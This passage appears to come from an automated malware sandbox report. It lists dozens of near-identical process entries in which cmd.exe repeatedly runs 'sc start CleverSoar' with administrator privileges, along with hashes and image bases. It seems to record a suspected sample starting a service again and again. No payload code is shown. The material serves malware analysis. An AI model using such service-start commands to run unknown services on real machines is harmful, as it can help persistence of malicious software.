                                                        Imagebase:0x7ff6ee680000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:34
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:35
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:36
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:37
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:38
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:39
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:40
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:41
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:42
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:43
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:44
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:46
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:47
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:51
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:52
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:53
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:54
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:55
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:56
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:57
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:58
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:59
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:60
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:61
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:62
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:63
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:64
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:65
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:66
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:67
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:68
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:69
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:70
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:71
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:72
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:73
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:74
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:75
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:76
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:77
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:78
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:79
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:80
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:81
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:82
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:83
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:84
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:85
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:86
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:87
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:88
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:89
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:90
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:91
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:92
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6e8930000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:93
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:94
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:95
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:96
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
